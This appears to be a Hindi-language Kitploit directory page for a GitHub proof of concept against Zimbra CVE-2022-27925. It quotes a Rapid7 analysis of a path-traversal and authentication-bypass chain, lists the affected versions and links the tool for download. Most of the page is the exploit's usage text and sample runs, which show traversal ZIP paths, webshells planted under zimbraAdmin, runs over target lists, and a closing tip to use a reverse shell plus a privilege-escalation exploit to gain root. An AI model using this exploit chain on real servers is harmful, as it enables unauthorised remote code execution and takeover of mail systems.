Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-27925 — Zimbra CVE-2022-27925 PoC | Kitploit
उपकरण/GitHubGitHub/josexv1/cve-2022-27925
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubjosexv1/cve-2022-27925

CVE-2022-27925

Zimbra CVE-2022-27925 PoC

रिपॉजिटरी देखें
43193 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-27925

विवरण

10 मई, 2022 को, Zimbra ने Zimbra Collaboration Suite में कई कमजोरियों को दूर करने के लिए संस्करण 9.0.0 पैच 24 और 8.8.15 पैच 31 जारी किए, जिनमें CVE-2022-27924 (जिसके बारे में हमने पहले लिखा था) और CVE-2022-27925 शामिल हैं।

मूल रूप से, Zimbra ने CVE-2022-27925 को एक प्रमाणित पथ-ट्रैवर्सल हमला कहा, जहां एक प्रशासनिक उपयोगकर्ता Zimbra खाते के रूप में फाइलसिस्टम पर किसी भी निर्देशिका में फ़ाइलें लिख सकता था। चूंकि यह मूल रूप से केवल प्रशासक-हमला माना जाता था, NVD ने इसे 7.8 का CVSS बेस स्कोर दिया। बाद में, Volexity ने देखा कि इस कमजोरी का शोषण करने वाले हमलावरों ने प्रशासनिक आवश्यकताओं को दरकिनार करने का एक तरीका खोज लिया था, और 10 अगस्त, 2022 को इसके बारे में लिखा। इस नए प्रमाणीकरण बाईपास को एक नया पहचानकर्ता मिला – CVE-2022-37042।

मूल पथ-ट्रैवर्सल कमजोरी और नए प्रमाणीकरण बाईपास को मिलाकर, हमलावर प्रशासक पोर्ट (डिफ़ॉल्ट रूप से, 7071) के माध्यम से गुमनाम रूप से एक Zimbra Collaboration Suite सिस्टम से दूरस्थ रूप से समझौता कर सकते हैं। हाल ही में हमने जिस विशेषाधिकार वृद्धि कमजोरी के बारे में लिखा था और जिसके लिए एक शोषण लिखा था, उसके साथ मिलकर, ये तीन कमजोरियां अप्रचलित सिस्टम पर रूट उपयोगकर्ता के रूप में दूरस्थ कमांड निष्पादन की ओर ले जाती हैं।

हालांकि सार्वजनिक सलाहकार इसमें उल्लेख नहीं करते, हमारे विश्लेषण के अनुसार, Zimbra Collaboration Suite Network Edition (भुगतान संस्करण) कमजोर है, और Open Source Edition (मुफ्त) नहीं है (क्योंकि इसमें कमजोर mboximport एंडपॉइंट नहीं है)। कमजोर संस्करण हैं:

root@kitploit:~
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (और इससे पहले के)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (और इससे पहले के)

ये कमजोरियां (और Zimbra में अन्य) जंगल में व्यापक शोषण के लिए लक्षित की जा रही हैं, और इसलिए जितनी जल्दी हो सके पैच या ऑफ़लाइन किया जाना चाहिए। यदि आपको संदेह है कि आपसे समझौता किया गया है, तो Zimbra डेटा खोए बिना नवीनतम पैच पर अपने Zimbra Collaboration Suite सर्वर को खरोंच से पुनर्निर्माण करने के लिए कदम प्रदान करता है।

Source: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis

उपयोग

root@kitploit:~
 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

usage: exploit.py [-h] [-t TARGET] [-l LIST]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URl with protocol HTTPS
  -l LIST, --list LIST  List of targets

नमूना रन

root@kitploit:~
root@root# python exploit.py -t zimbra.example.com
_____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux

root@root# python exploit.py -l targets.txt

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable

root@root# .

बॉक्स को रूट करें!

बॉक्स को रूट करने के लिए आप एक रिवर्स शेल कॉल कर सकते हैं, और फिर Slaper's LPE का उपयोग कर सकते हैं।

टूल डाउनलोड करें